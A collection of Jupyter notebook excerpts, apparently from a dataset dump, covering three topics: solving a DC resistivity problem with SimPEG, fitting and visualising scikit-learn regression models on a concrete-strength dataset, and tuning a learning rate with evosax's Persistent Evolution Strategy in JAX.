source_loc_inds = Utils.closestPoints(mesh, source_locs)
a_loc_mesh = mesh.gridCC[source_loc_inds[0],:]
b_loc_mesh = mesh.gridCC[source_loc_inds[1],:]
# plot it
plt.colorbar(mesh.plotImage(sigma)[0])
plt.plot(a_loc_mesh[0], a_loc_mesh[1],'wv', markersize=8) # a-electrode
plt.plot(b_loc_mesh[0], b_loc_mesh[1],'w^', markersize=8) # b-electrode
plt.title('electrical conductivity, $\sigma$')
```
### Assemble and solve the DC system of equations
How we construct the divergence operator is discussed in [divergence.ipynb](divergence.ipynb), and the inner product matrix in [weakformulation.ipynb](weakformulation.ipynb). The final system is assembled and discussed in [play.ipynb](play.ipynb) (with widgets!).
```
mesh.faceDiv??
# Assemble and solve the DC resistivity problem
Div = mesh.faceDiv
Sigma = mesh.getFaceInnerProduct(sigma, invProp=True, invMat=True)
Vol = Utils.sdiag(mesh.vol)
# assemble the system matrix
A = Vol * Div * Sigma * Div.T * Vol
# right hand side
q = np.zeros(mesh.nC)
q[source_loc_inds] = np.r_[+1, -1]
from SimPEG import Solver # import the default solver (LU)
# solve the DC resistivity problem
Ainv = Solver(A) # create a matrix that behaves like A inverse
phi = Ainv * q
# look at the results!
plt.colorbar(mesh.plotImage(phi)[0])
plt.title('Electric Potential, $\phi$');
```
## What just happened!?
In the notebooks that follow, we will
- define where variables live on the mesh ([mesh.ipynb](mesh.ipynb))
- define the discrete divergence ([divergence.ipynb](divergence.ipynb))
- use the weak formulation to define a solveable system of equations ([weakformulation.ipynb](weakformulation.ipynb))
- solve and play with the DC resistivity equations ([all_together_now.ipynb](all_together_now.ipynb))
| github_jupyter |
# Predictive models
A set of supporting code snippets for the presentation.
### Plant energy output dataset
Example datasets:
`plant.csv`: containing records of energy output of electricity generator wrt different parameters.
`concrete.csv`: containing records of concrete strength wrt time and cement in mixture.
```
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(True)
import numpy as np
import pandas as ps
csv = ps.read_csv('concrete.csv')
XY = csv.as_matrix()[::1]
X, y = XY[:, (0, 1)], XY[:, -1]
data = [
go.Scatter3d(
x = X[:,0], y = X[:,1], z = y,
mode='markers', marker={'size': 3})
]
layout = go.Layout(
title='Dataset',
autosize=True,
margin=dict(l=65,r=50,b=65,t=90),
scene=go.Scene(
xaxis=dict(title=csv.columns[0]),
yaxis=dict(title=csv.columns[1]),
zaxis=dict(title=csv.columns[-1]),
)
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig)
import numpy as np
import pandas as ps
from time import time
# Choice of models inspired by
# https://arxiv.org/pdf/1708.05070.pdf
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR, LinearSVR
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV, train_test_split
def render_model(model, X, y):
"""Evaluates model on the domain of a dataset"""
resolution = 37
X1 = np.linspace(min(X[:, 0]), max(X[:, 0]), resolution)
X2 = np.linspace(min(X[:, 1]), max(X[:, 1]), resolution)
X1, X2 = np.meshgrid(X1, X2)
Z = X1 * 0.0
for i in range(X1.shape[0]):
for j in range(X1.shape[1]):
Z[i,j] = model.predict([[X1[i,j], X2[i,j]]])[0]
return X1, X2, Z
# rendering function
def fnc(model_class='lin', C=1.0, gamma=1.0, n_neighbors=1,
n_estimators=10, max_depth=1, min_samples_split=0.5,
learning_rate=0.01):
# parameters for different model classes
lin = {
'model': [LinearSVR(max_iter=100000)],
'model__C': [10 ** C],
}
knn = {
'model': [KNeighborsRegressor()],
'model__n_neighbors': [n_neighbors],
}
svr = {
'model': [SVR(epsilon=10.0)],
'model__C': [10 ** C],
'model__gamma': [10.0 ** gamma],
}
tree = {
'model': [DecisionTreeRegressor()],
'model__max_depth': [max_depth],
'model__min_samples_split': [min_samples_split],
}
gbrt = {
'model': [GradientBoostingRegressor()],
'model__n_estimators': [n_estimators],
'model__learning_rate': [10 ** learning_rate],
}
model = {'lin': lin, 'knn': knn, 'svm': svr, 'gbrt': gbrt, 'tree': tree}[model_class]
if model_class == 'tree' or model_class == 'lin':
pipe = Pipeline([
('model', GradientBoostingRegressor()),
])
else:
pipe = Pipeline([
('scale', RobustScaler()),
('model', GradientBoostingRegressor()),
])
model = GridSearchCV(
estimator=pipe,
param_grid=[model],
n_jobs=-1,
)
# read data
csv = ps.read_csv('concrete.csv')
XY = csv.as_matrix()
# split data into inputs and outputs
X, y = XY[:, :-1], XY[:, -1]
# split data into training and testing data
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.75)
start_time = time()
# search for best hyperparameters
model.fit(X_train, y_train)
# evaluate model
fitting_time = time() - start_time
train_score = model.best_score_
test_score = model.score(X_test, y_test)
print("Model fit time: %s, val. score: %s, test score: %s" % (fitting_time, train_score, test_score))
# rendering code
Xp, Yp, Zp = render_model(model, X, y)
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(True)
data = [
go.Scatter3d(
x=X[:, 0], y=X[:, 1], z=y,
mode='markers', marker={'size': 1}),
go.Surface(
x=Xp, y=Yp, z=Zp
)
]
if model_class == 'svm':
# get the trained linear model
svm_model = model.best_estimator_.steps[-1][-1]
# print the weights of the model
I = svm_model.support_
data.append(
go.Scatter3d(
x=X_train[I, 0], y=X_train[I, 1], z=y_train[I],
mode='markers', marker={'size': 3}),
)
# 3d rendering done here using plot.ly
layout = go.Layout(
title=model_class,
autosize=True,
margin=dict(l=1, r=1, b=40, t=30),
scene=go.Scene(
xaxis=dict(title=csv.columns[0]),
yaxis=dict(title=csv.columns[1]),
zaxis=dict(title=csv.columns[-1]),
)
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig)
#py.plot(fig)
if model_class == 'lin':
# get the trained linear model
lin_model = model.best_estimator_.steps[-1][-1]
# print the weights of the model
print('Model weights: %s' % dict(zip(csv.columns[:2], lin_model.coef_)))
if model_class == 'svm':
# get the trained linear model
svm_model = model.best_estimator_.steps[-1][-1]
# print the weights of the model
print('Support vectors: %s' % len(svm_model.support_))
if model_class == 'tree':
# tree rendering done here
tree_model = model.best_estimator_.steps[-1][-1]
import graphviz
from sklearn import tree
from IPython.core.display import display
dot_data = tree.export_graphviz(tree_model, out_file=None,
feature_names=csv.columns[:2], label='all',
filled=True, rounded=True, impurity=False,
special_characters=True)
graph = graphviz.Source(dot_data)
display(graph)
# ignore warnings for clean output
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
# interactive part done here
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
from ipywidgets import FloatSlider, IntSlider
# short - hand definitions of sliders
fr=lambda x, y: FloatSlider(min=x, max=y, continuous_update=False)
ir=lambda x, y: IntSlider(min=x, max=y, continuous_update=False)
# all interactive cell outputs
interact(lambda C: fnc('lin', C=C), C=fr(-6,5));
interact(lambda n_neighbors: fnc('knn', n_neighbors=n_neighbors),
n_neighbors=ir(1,100));
interact(lambda C, gamma: fnc('svm', C=C, gamma=gamma),
C=fr(-3,4), gamma=fr(-3, 4));
interact(lambda max_depth, min_samples_split: fnc('tree', max_depth=max_depth, min_samples_split=min_samples_split),
max_depth=ir(1,16), min_samples_split=fr(0.01, 1.0));
interact(lambda n_estimators, learning_rate: fnc('gbrt', n_estimators=n_estimators, learning_rate=learning_rate),
n_estimators=ir(1,100), learning_rate=fr(-4, 4));
```
| github_jupyter |
# 04 - Persistent ES on Learning Rate Tuning Problem
### [Last Update: March 2022][](https://colab.research.google.com/github/RobertTLange/evosax/blob/main/examples/04_mlp_pes.ipynb)
```
%matplotlib inline
%load_ext autoreload
%autoreload 2
%config InlineBackend.figure_format = 'retina'
!pip install git+https://github.com/RobertTLange/evosax.git@main
```
## Problem as in [Vicol et al. (2021)](http://proceedings.mlr.press/v139/vicol21a/vicol21a-supp.pdf) - Toy 2D Regression
```
import jax
import jax.numpy as jnp
from functools import partial
def loss(x):
"""Inner loss."""
return (
jnp.sqrt(x[0] ** 2 + 5)
- jnp.sqrt(5)
+ jnp.sin(x[1]) ** 2 * jnp.exp(-5 * x[0] ** 2)
+ 0.25 * jnp.abs(x[1] - 100)
)
def update(state, i):
"""Performs a single inner problem update, e.g., a single unroll step."""
(L, x, theta, t_curr, T, K) = state
lr = jnp.exp(theta[0]) * (T - t_curr) / T + jnp.exp(theta[1]) * t_curr / T
x = x - lr * jax.grad(loss)(x)
L += loss(x) * (t_curr < T)
t_curr += 1
return (L, x, theta, t_curr, T, K), x
@partial(jax.jit, static_argnums=(3, 4))
def unroll(x_init, theta, t0, T, K):
"""Unroll the inner problem for K steps."""
L = 0.0
initial_state = (L, x_init, theta, t0, T, K)
state, outputs = jax.lax.scan(update, initial_state, None, length=K)
(L, x_curr, theta, t_curr, T, K) = state
return L, x_curr
```
### Initialize Persistent Evolution Strategy
```
from evosax import PersistentES
popsize = 100
T = 100
K = 10
strategy = PersistentES(popsize=popsize, num_dims=2)
es_params = strategy.default_params
es_params["T"] = 100
es_params["K"] = 10
rng = jax.random.PRNGKey(5)
state = strategy.initialize(rng, es_params)
# Initialize inner parameters
t = 0
xs = jnp.ones((popsize, 2)) * jnp.array([1.0, 1.0])
```
### Run Outer PES Loop of Inner GD Loops :)
```
for i in range(5000):
rng, skey = jax.random.split(rng)
if t >= es_params["T"]:
# Reset the inner problem: iteration, parameters
t = 0
xs = jnp.ones((popsize, 2)) * jnp.array([1.0, 1.0])
x, state = strategy.ask(rng, state, es_params)
# Unroll inner problem for K steps using antithetic perturbations
fitness, xs = jax.vmap(unroll, in_axes=(0, 0, None, None, None))(
xs, x, t, es_params["T"], es_params["K"]
)
# Update ES - outer step!
state = strategy.tell(x, fitness, state, es_params)
t += es_params["K"]
# Evaluation!
if i % 500 == 0:
L, _ = unroll(
jnp.array([1.0, 1.0]), state["mean"], 0, es_params["T"], es_params["T"]
)
print(i, state["mean"], L)
```
| github_jupyter |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.